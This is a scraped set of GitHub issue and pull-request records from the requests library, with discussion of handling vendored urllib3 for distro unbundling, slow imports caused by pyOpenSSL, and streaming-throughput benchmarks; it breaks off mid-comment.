{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2375/reactions" }
https://api.github.com/repos/psf/requests/issues/2375/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2375.diff", "html_url": "https://github.com/psf/requests/pull/2375", "merged_at": "2015-01-09T20:38:31Z", "patch_url": "https://github.com/psf/requests/pull/2375.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2375" }
true
[ "I don't really see why this is our problem. Debian/downstream have introduced this bug, why are we the ones fixing it?\n", "The reason pip did this is primarily because while it annoys me to no end what the downstream re-distributors do I felt that ultimately it was better for the end-users if we made sure this particular bug was fixed. In the end, as much as I wish they wouldn't, downstream is going to unbundle stuff and I think it's wholly better if they all do it in the same way that works more or less transparently than if each one invents it's own way of doing it with it's own caveats.\n", "@Lukasa because it's faster if we fix it and provide a little extra flexibility at ~~no~~ little extra cost.\n", "Hello,\nI can understand how @lukasa is annoyed by unvendoring made downstream, but I can also understand why this is done. For example, in Debian, Python SSLv3 support was removed and I only had to patch (I forwared my patch upstream of course[¹]) urllib3 to fix all packages depending on urllib3.\n\nSo, yes, this is a downstream problem, but as in past (even when this issue arosed on Debian Bug Tracker) I will never add something without asking first if you, upstream developers, are ok with a downstream change. \n As I said a lot of time before being the Debian maintainer of requests I'm one of its users: I want requests to be in the best shape in Debian. :)\n\nI agree with @dstufft and @sigmavirus24 but, if you don't agree, I can also replace the currently used patch in Debian with this so, at least, Debian, Ubuntu and pip will use the same code.\nIMHO cooperating we will arrive to the best solution for all.\n\n[¹] http://anonscm.debian.org/viewvc/python-modules/packages/python-urllib3/tags/1.9.1-3/debian/patches/06_do-not-make-SSLv3-mandatory.patch?view=markup Yes, next time I will use a PR, fortunately @dstufft forwarded it properly! 
:)\n", "@eriolv question: Since the symlink is in place (it may just be Fedora that has this in place), is there any chance of the imports that import from `.packages` inside of requests could not be rewritten? \n\nIf not, can the imports not be rewritten after we ship this patch? (After we've updated it to give proper attribution to @dstufft and pypa/pip) The crux of this issue is that sys.modules is incorrectly populated and needs to work a certain way for users to not run into surprises like this.\n\n[/Edit - I submitted my comment too soon]\nAnd I appreciate your collaboration @eriolv. That's why I pinged you immediately. I wanted to make you aware of this from the start and get your feedback as well as @Lukasa's and @ralphbean's\n", "You don't need to rewrite imports with either the symlinks or this solution. The major difference between symlinks and this solution is. With symlinks the import system is going to see `urllib3` and `requests.packages.urllib3` as two different things. With this it should treat them as the same because it's just aliases the exact same module object in `sys.modules`. This _should_ mean, though I don't think I tested it, that it doesn't matter if people import from `urllib3` or `requests.packages.urllib3`.\n", "My snarkiness was mostly the result of me waking up late and being late for work and having not had coffee, apologies all.\n\nIn reality I'm +0 on this. I don't like that we have to do it, and the unvendoring zealots have hardened my opinion towards the idea of doing them any favours on any issue whatsoever. (I don't include you in that group @eriolv, you have not displayed any zealotry that I'm aware of :wink: )\n\nHowever, I acknowledge the Catch-22 of the fact that _we_ will get blamed for the zealots decision to unbundle us breaking their code. 
For that reason I have no intention of blocking this patch: punishing users is unacceptable.\n\nHowever, I'd like _someone_ to test the change, as neither @sigmavirus24 nor @dstufft appear to have. Ideally I'd like some form of automated testing for it as well: having that would raise me to +0.5.\n", "To be clear, I tested it in the context of pip :) I have not tested it in the context of requests. The major difference being that pip's bundled stuff isn't generally imported outside of pip. In pip we also modify the `setup.py` so there is an environment variable that downstream can set to unbundle things without patching which raises a warning saying that it's an unsupported mechanism for installing pip. We then use this to install pip unbundled and run all of our tests in CI with installed copies of everything. However a difference between pip and requests in this is that pip will only bundle a released copy of something and we also have a vendor.txt which is a file in the requirements.txt file format which lists the exact versions we've bundled. So we can easily install the required things by just doing `pip install -r pip/_vendor/vendor.txt`.\n", "To be more clear! I know that this will make it so that `import requests.packages.urllib3` will fall back to `import urllib3` automatically without doing an import writes. The thing I haven't tested is that you can do something like:\n\n``` python\nimport requests.packages.urllib3``\nimport urllib3\n\nassert isinstance(urllib3.Timeout, requests.packages.urllib3.Timeout)\n```\n", "Oh, and I wrote this in it's entirety, so feel free to license/attribute it however you want. I don't really care.\n", "@dstufft Indeed, and that's what's important. I want to make sure that if we're doing this we do it right the first time.\n\nNote that it obviously won't do that on vendored systems. 
=)\n", "Yea, well really people should just always import from `requests.packages` and never from the top level packages if they are using things in conjunction with requests, but yea it +1 on testing that it works the way I think it does :D\n", "> Fedora and Debian have both recently added symlinks to their distributions of requests so people can do from requests.packages import urllib3 but they seem to still rewrite our import statements\n\nHey, in Fedora rawhide (the most advanced branch, the \"rolling release\") we're not rewriting the imports anymore. That patch didn't make it into Fedora 21 though -- just released yesterday.\n", "Thanks @ralphbean. Will Fedora 21 be able to generate a new build with this change at least?\n\nAlso, to everyone commenting on the fact that this file still references pip, I pulled this in and committed it to start a discussion. This will not be merged as is.\n", "> Will Fedora 21 be able to generate a new build with this change at least?\n\nYes, it can. 
We needed to let it sit frozen in preparation for that initial release.\n", "This is so annoying :)\n", "I dislike everything about this.\n\nNot saying we shouldn't be doing it yet — just documenting my feelings.\n", "So I did the following:\n\n```\n$ mktmpenv -ppython{{version}}\n$ pip install /path/to/requests/ # Where this is the git repo checked out on this branch\n$ cd lib/python{{version}}/site-packages/requests/packages/\n$ rm -rf chardet urllib3\n$ cd - # Back in the temporary virtualenv directory\n$ pip install chardet urllib3\n$ python\n```\n\nThen at the console I did\n\n``` py\n>>> import requests\n>>> requests.get('https://httpbin.org/get')\n<Response [200]>\n>>> import sys\n>>> sys.modules['requests.packages.urllib3']\n<module 'urllib3' from '/Users/ian7708/virtualenv/tmp-421360116860cb19/lib/python2.7/site-packages/urllib3/__init__.pyc'>\n>>> import urllib3\n>>> sys.modules['requests.packages.urllib3'] is urllib3\nTrue\n```\n\nSo we're getting the right module and it has the right name. I'm forgetting though, were there other things we need to check?\n", "It should hold true but the only thing I can think of is make sure that `assert isinstance(urllib3.Timeout, requests.packages.urllib3.Timeout)` is `True`.\n", "``` py\n>>> isinstance(urllib3.Timeout(5), requests.packages.urllib3.Timeout)\nTrue\n```\n", "It should totally work then.\n", "I'm comfortable using this. It'd be great to have access to our CI and set up a job for this but I'm not sure that will happen in a practical period of time\n", "@Lukasa thoughts?\n", "I'm with @kennethreitz. I don't like it, but I think we have to do it.\n", "To be clear, I don't _like_ it either, but given that downstream is unlikely to stop de-bundling anytime soon I prefer to control the way they do it.\n", "I think the only people who will be happy to have this will be our users frankly. Aren't they who matter most?\n", "@kennethreitz @Lukasa either of you have time to give this another once over? 
This will vastly improve user experience when using downstream distributed modules. Believe it, or not, it will also reduce the number of changes downstream re-distributors need to make to requests itself as well. Finally, it will make requests far more stable for our users on those systems who do not have the ability to \"Just use pip\". I still prefer to use pip myself (because I like to have a better control over what I use) but that isn't a luxury everyone has who wants to (and needs to) use requests. We shouldn't begrudge them for having a different set of constraints than we typically have.\n", "The code looks good to me, as it did originally, though I'm hardly an expert on Python's import machinery.\n\nI still resent the requirement to add this code. I accept the benefits and acknowledge the need for it, I just refuse to be happy about it. ;) Basically, I feel the same way about this as I do about cleaning the house.\n\nI'm +1 on merging, I'm sure I'll get over the pain. Want @kennethreitz to sign off though.\n", "I don't like this. I'd much rather convince the distro maintainers to stop mangling our code.\n", "I am currently using requests and requests-toolbelt in a CLI tool (which breaks due to this kind of imports), and since...\n- no clear consensus has been found so far\n- https://github.com/sigmavirus24/requests-toolbelt/pull/40 doesn't seem to get merged anytime soon\n- I get support requests for this every week\n\n...I am considering monkeypatching sys.modules for my tool to work on older Debian versions. For newer ones, I don't think there's a fix for such issues.\n" ]
https://api.github.com/repos/psf/requests/issues/2374
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2374/labels{/name}
https://api.github.com/repos/psf/requests/issues/2374/comments
https://api.github.com/repos/psf/requests/issues/2374/events
https://github.com/psf/requests/pull/2374
51,348,660
MDExOlB1bGxSZXF1ZXN0MjU2OTQ3NTI=
2,374
Updated the broken link to twitter streaming API documentation
{ "avatar_url": "https://avatars.githubusercontent.com/u/3087430?v=4", "events_url": "https://api.github.com/users/krvc/events{/privacy}", "followers_url": "https://api.github.com/users/krvc/followers", "following_url": "https://api.github.com/users/krvc/following{/other_user}", "gists_url": "https://api.github.com/users/krvc/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/krvc", "id": 3087430, "login": "krvc", "node_id": "MDQ6VXNlcjMwODc0MzA=", "organizations_url": "https://api.github.com/users/krvc/orgs", "received_events_url": "https://api.github.com/users/krvc/received_events", "repos_url": "https://api.github.com/users/krvc/repos", "site_admin": false, "starred_url": "https://api.github.com/users/krvc/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/krvc/subscriptions", "type": "User", "url": "https://api.github.com/users/krvc", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-12-08T20:34:47Z
2021-09-08T09:01:09Z
2014-12-08T23:46:08Z
CONTRIBUTOR
resolved
The existing link to Twitter streaming API is broken in the Requests documentation. Updated the link with the working URL.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2374/reactions" }
https://api.github.com/repos/psf/requests/issues/2374/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2374.diff", "html_url": "https://github.com/psf/requests/pull/2374", "merged_at": "2014-12-08T23:46:08Z", "patch_url": "https://github.com/psf/requests/pull/2374.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2374" }
true
[ "Thanks @krvc \n" ]
https://api.github.com/repos/psf/requests/issues/2373
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2373/labels{/name}
https://api.github.com/repos/psf/requests/issues/2373/comments
https://api.github.com/repos/psf/requests/issues/2373/events
https://github.com/psf/requests/pull/2373
51,332,370
MDExOlB1bGxSZXF1ZXN0MjU2ODQ2NzY=
2,373
Enable GitHub syntax highlighting on README
{ "avatar_url": "https://avatars.githubusercontent.com/u/416575?v=4", "events_url": "https://api.github.com/users/frewsxcv/events{/privacy}", "followers_url": "https://api.github.com/users/frewsxcv/followers", "following_url": "https://api.github.com/users/frewsxcv/following{/other_user}", "gists_url": "https://api.github.com/users/frewsxcv/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/frewsxcv", "id": 416575, "login": "frewsxcv", "node_id": "MDQ6VXNlcjQxNjU3NQ==", "organizations_url": "https://api.github.com/users/frewsxcv/orgs", "received_events_url": "https://api.github.com/users/frewsxcv/received_events", "repos_url": "https://api.github.com/users/frewsxcv/repos", "site_admin": false, "starred_url": "https://api.github.com/users/frewsxcv/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/frewsxcv/subscriptions", "type": "User", "url": "https://api.github.com/users/frewsxcv", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-12-08T18:04:33Z
2021-09-08T09:01:10Z
2014-12-08T18:40:45Z
CONTRIBUTOR
resolved
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2373/reactions" }
https://api.github.com/repos/psf/requests/issues/2373/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2373.diff", "html_url": "https://github.com/psf/requests/pull/2373", "merged_at": "2014-12-08T18:40:44Z", "patch_url": "https://github.com/psf/requests/pull/2373.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2373" }
true
[ ":+1: \n", "reStructuredText on GitHub is so weird. Thanks @frewsxcv \n" ]
https://api.github.com/repos/psf/requests/issues/2372
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2372/labels{/name}
https://api.github.com/repos/psf/requests/issues/2372/comments
https://api.github.com/repos/psf/requests/issues/2372/events
https://github.com/psf/requests/issues/2372
51,270,385
MDU6SXNzdWU1MTI3MDM4NQ==
2,372
"import requests" is very slow on python2 when ndg-httpsclient and pyasn1 are available
{ "avatar_url": "https://avatars.githubusercontent.com/u/1496354?v=4", "events_url": "https://api.github.com/users/douardda/events{/privacy}", "followers_url": "https://api.github.com/users/douardda/followers", "following_url": "https://api.github.com/users/douardda/following{/other_user}", "gists_url": "https://api.github.com/users/douardda/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/douardda", "id": 1496354, "login": "douardda", "node_id": "MDQ6VXNlcjE0OTYzNTQ=", "organizations_url": "https://api.github.com/users/douardda/orgs", "received_events_url": "https://api.github.com/users/douardda/received_events", "repos_url": "https://api.github.com/users/douardda/repos", "site_admin": false, "starred_url": "https://api.github.com/users/douardda/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/douardda/subscriptions", "type": "User", "url": "https://api.github.com/users/douardda", "user_view_type": "public" }
[]
closed
true
null
[]
null
5
2014-12-08T08:55:23Z
2021-09-08T23:06:51Z
2014-12-08T15:34:54Z
NONE
resolved
Just after upgrading my laptop to jessie, I discovered a problem with python requests on py2. For the record, I've created a Debian bug report https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=772506 But to summarize the problem (in a fresh jessie docker container): In a fresh virtualenv (on a jessie box): ``` (tst)root@ead8881e8ed5:/# pip install requests Downloading/unpacking requests Downloading requests-2.5.0-py2.py3-none-any.whl (464kB): 464kB downloaded Installing collected packages: requests Successfully installed requests Cleaning up... (tst)root@ead8881e8ed5:/# time python -c "import requests" real 0m0.087s user 0m0.044s sys 0m0.040s (tst)root@ead8881e8ed5:/# pip install ndg-httpsclient [...] (req)root@ead8881e8ed5:/req# time python -c "import requests" /req/local/lib/python2.7/site-packages/ndg/httpsclient/subj_alt_name.py:22: UserWarning: Error importing pyasn1, subjectAltName check for SSL peer verification will be disabled. Import error is: No module named pyasn1.type warnings.warn(import_error_msg) /req/local/lib/python2.7/site-packages/ndg/httpsclient/ssl_peer_verification.py:24: UserWarning: SubjectAltName support is disabled - check pyasn1 package installation to enable warnings.warn(SUBJ_ALT_NAME_SUPPORT_MSG) /req/local/lib/python2.7/site-packages/ndg/httpsclient/subj_alt_name.py:22: UserWarning: Error importing pyasn1, subjectAltName check for SSL peer verification will be disabled. Import error is: No module named pyasn1.type warnings.warn(import_error_msg) real 0m0.100s user 0m0.080s sys 0m0.012s (req)root@ead8881e8ed5:/req# pip install pyasn1 [...] (req)root@ead8881e8ed5:/req# time python -c "import requests" real 0m0.769s user 0m0.712s sys 0m0.052s ``` Notice the last time measurement (almost 800ms), which is very painful since I use requests in cmdline utilities and mercurial extensions... David
{ "avatar_url": "https://avatars.githubusercontent.com/u/1496354?v=4", "events_url": "https://api.github.com/users/douardda/events{/privacy}", "followers_url": "https://api.github.com/users/douardda/followers", "following_url": "https://api.github.com/users/douardda/following{/other_user}", "gists_url": "https://api.github.com/users/douardda/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/douardda", "id": 1496354, "login": "douardda", "node_id": "MDQ6VXNlcjE0OTYzNTQ=", "organizations_url": "https://api.github.com/users/douardda/orgs", "received_events_url": "https://api.github.com/users/douardda/received_events", "repos_url": "https://api.github.com/users/douardda/repos", "site_admin": false, "starred_url": "https://api.github.com/users/douardda/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/douardda/subscriptions", "type": "User", "url": "https://api.github.com/users/douardda", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2372/reactions" }
https://api.github.com/repos/psf/requests/issues/2372/timeline
null
completed
null
null
false
[ "Your debian bug report blames OpenSSL, and shows that the time is lost in yacc. This suggests to me that it should only happen the first time: parsing shouldn't be required on initialization after the first time. Is that right, or does it happen consistently?\n", "It happens consistently (otherwise it would not be an issue).\n", "Interesting. The Debian bug shows the time is in `cryptography`. Ping @alex?\n", "Is this reproducible just by doing `time python -c \"import OpenSSL\"`? If so, that would indicate that this is a problem with that package, not requests. (And we have no alternatives to be able to provide SNI for old versions of Python.)\n", "Yes, python -c \"import OpenSSL\" is the slow fellow. And it's been reported already https://github.com/pyca/pyopenssl/issues/137\n\nSo I guess we can close this issue.\n" ]
https://api.github.com/repos/psf/requests/issues/2371
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2371/labels{/name}
https://api.github.com/repos/psf/requests/issues/2371/comments
https://api.github.com/repos/psf/requests/issues/2371/events
https://github.com/psf/requests/issues/2371
51,049,181
MDU6SXNzdWU1MTA0OTE4MQ==
2,371
requests has poor performance streaming large binary responses
{ "avatar_url": "https://avatars.githubusercontent.com/u/772?v=4", "events_url": "https://api.github.com/users/alex/events{/privacy}", "followers_url": "https://api.github.com/users/alex/followers", "following_url": "https://api.github.com/users/alex/following{/other_user}", "gists_url": "https://api.github.com/users/alex/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/alex", "id": 772, "login": "alex", "node_id": "MDQ6VXNlcjc3Mg==", "organizations_url": "https://api.github.com/users/alex/orgs", "received_events_url": "https://api.github.com/users/alex/received_events", "repos_url": "https://api.github.com/users/alex/repos", "site_admin": false, "starred_url": "https://api.github.com/users/alex/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/alex/subscriptions", "type": "User", "url": "https://api.github.com/users/alex", "user_view_type": "public" }
[ { "color": "f7c6c7", "default": false, "description": null, "id": 167537670, "name": "Propose Close", "node_id": "MDU6TGFiZWwxNjc1Mzc2NzA=", "url": "https://api.github.com/repos/psf/requests/labels/Propose%20Close" } ]
closed
true
null
[]
null
40
2014-12-05T00:37:40Z
2021-09-08T04:00:55Z
2016-04-16T04:14:55Z
MEMBER
resolved
https://github.com/alex/http-client-bench contains the benchmarks I used. The results are something like: | | requests/http | socket | | --- | --- | --- | | CPython | 12MB/s | 200MB/s | | PyPy | 80MB/s | 300MB/s | | Go | 150MB/s | n/a | requests imposes a considerable overhead compared to a socket, particularly on CPython.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2371/reactions" }
https://api.github.com/repos/psf/requests/issues/2371/timeline
null
completed
null
null
false
[ "That overhead is unexpectedly large. However, avoiding it might be tricky.\n\nThe big problem is that we do quite a lot of processing per chunk. That's all the way down the stack: requests, urllib3 and httplib. It would be extremely interesting to see where the time is being spent to work out who is causing the inefficiency.\n", "guess a next step would be to try profiling httplib / urllib3 to see the\nperformance there?\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Thu, Dec 4, 2014 at 5:01 PM, Cory Benfield [email protected]\nwrote:\n\n> That overhead is unexpectedly large. However, avoiding it might be tricky.\n> \n> The big problem is that we do quite a lot of processing per chunk. That's\n> all the way down the stack: requests, urllib3 and httplib. It would be\n> extremely interesting to see where the time is being spent to work out who\n> is causing the inefficiency.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65732050\n> .\n", "Just ran benchmarks with urllib3:\n\nPyPy: 120MB/s\nCPython: 70MB/s\n\nAnd I re-ran CPython + requests: 35MB/s\n\n(My machine seems to be experiencing a fair bit of noise in benchmarks, if anyone has a quieter system they can run these on, that'd be awesome)\n", "I tried running these on my machine after shutting down every other\napplication & terminal window and got a fair amount of noise as well - the\nsocket benchmark was anywhere from 30mb/s to 460mb/s.\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Thu, Dec 4, 2014 at 9:24 PM, Alex Gaynor [email protected]\nwrote:\n\n> Just ran benchmarks with urllib3:\n> \n> PyPy: 120MB/s\n> CPython: 70MB/s\n> \n> And I re-ran CPython + requests: 35MB/s\n> \n> (My machine seems to be experiencing a fair bit of noise in benchmarks, if\n> anyone has a quieter system they can run these on, that'd be awesome)\n> \n> —\n> Reply to this email directly or view it on 
GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65748982\n> .\n", "I made the benchmarks easier to run now, so other folks can hopefully verify my numbers:\n\nCPython:\n\n```\nBENCH SOCKET:\n 8GiB 0:00:22 [ 360MiB/s] [======================================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:02:34 [53.1MiB/s] [======================================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:30 [90.2MiB/s] [======================================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:30 [90.7MiB/s] [======================================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:26 [ 305MiB/s] [======================================================>] 100%\n```\n\nPyPy:\n\n```\nBENCH SOCKET:\n 8GiB 0:00:22 [ 357MiB/s] [======================================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:00:43 [ 189MiB/s] [======================================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:07 [ 121MiB/s] [======================================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:09 [ 117MiB/s] [======================================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:26 [ 307MiB/s] [======================================================>] 100%\n```\n", "Uh...those numbers are weird. CPython's httplib is slower than requests or urllib3, even though both libraries use httplib? That just cannot be right.\n", "They reproduce consistently for me -- can you try the benchmarks and see if\nyou can reproduce? Assuming you can, do you see anything wrong with the\nbenchmarks?\n\nOn Fri Dec 05 2014 at 11:16:45 AM Cory Benfield [email protected]\nwrote:\n\n> Uh...those numbers are weird. CPython's httplib is slower than requests or\n> urllib3, even though both libraries use httplib? 
That just cannot be right.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65821989\n> .\n", "I'm just grabbing a known-quiet machine now. Should take a few minutes to become available because it's a physical box that has to get installed (god I love MAAS).\n", "`CPython 2.7.8`\n\n```\nBENCH SOCKET:\n 8GiB 0:00:26 [ 309MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:02:24 [56.5MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:42 [79.7MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:45 [77.9MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:27 [ 297MiB/s] [================================>] 100%\n```\n", "For what it's worth:\n\n[This patch](https://gist.github.com/frewsxcv/1c0f3c81cda508e1bca9), `CPython 3.4.2`:\n\n```\nBENCH SOCKET:\n 8GiB 0:00:27 [ 302MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:00:53 [ 151MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:00:54 [ 149MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:00:56 [ 144MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:31 [ 256MiB/s] [================================>] 100%\n```\n", "You should be able to get that same effect on Python2 with\n`env PYTHONUNBUFFERED=` or the `-u` flag.\n\nOn Fri Dec 05 2014 at 11:42:36 AM Corey Farwell [email protected]\nwrote:\n\n> For what it's worth:\n> \n> This patch https://gist.github.com/frewsxcv/1c0f3c81cda508e1bca9, CPython\n> 3.4.2:\n> \n> BENCH SOCKET:\n> 8GiB 0:00:27 [ 302MiB/s] [================================>] 100%\n> BENCH HTTPLIB:\n> 8GiB 0:00:53 [ 151MiB/s] [================================>] 100%\n> BENCH URLLIB3:\n> 8GiB 0:00:54 [ 149MiB/s] [================================>] 100%\n> BENCH REQUESTS\n> 8GiB 0:00:56 [ 144MiB/s] [================================>] 100%\n> BENCH 
GO HTTP\n> 8GiB 0:00:31 [ 256MiB/s] [================================>] 100%\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2371#issuecomment-65826239\n> .\n", "@alex Interestingly, neither `env PYTHONUNBUFFERED=` or `-u` has the same effect on Python 2. Results from my machine incoming.\n", "Alright, the below data comes from a machine that is doing nothing else but running these tests. The last test was run with the Python `-u` flag set, and as you can see that flag has no effect.\n\n```\nPython 2.7.6\ngo version go1.2.1 linux/amd64\nBENCH SOCKET:\n 8GiB 0:00:16 [ 500MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:01:32 [88.6MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:21 [ 100MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:21 [ 385MiB/s] [================================>] 100%\n```\n\n```\nPython 2.7.6\ngo version go1.2.1 linux/amd64\nBENCH SOCKET:\n 8GiB 0:00:16 [ 503MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:01:33 [87.8MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:22 [99.3MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:20 [ 391MiB/s] [================================>] 100%\n```\n\n```\nPython 2.7.6\ngo version go1.2.1 linux/amd64\nBENCH SOCKET:\n 8GiB 0:00:16 [ 506MiB/s] [================================>] 100%\nBENCH HTTPLIB:\n 8GiB 0:01:31 [89.1MiB/s] [================================>] 100%\nBENCH URLLIB3:\n 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\nBENCH REQUESTS\n 8GiB 0:01:20 [ 101MiB/s] [================================>] 100%\nBENCH GO HTTP\n 8GiB 0:00:21 [ 389MiB/s] [================================>] 100%\n```\n\nThese numbers 
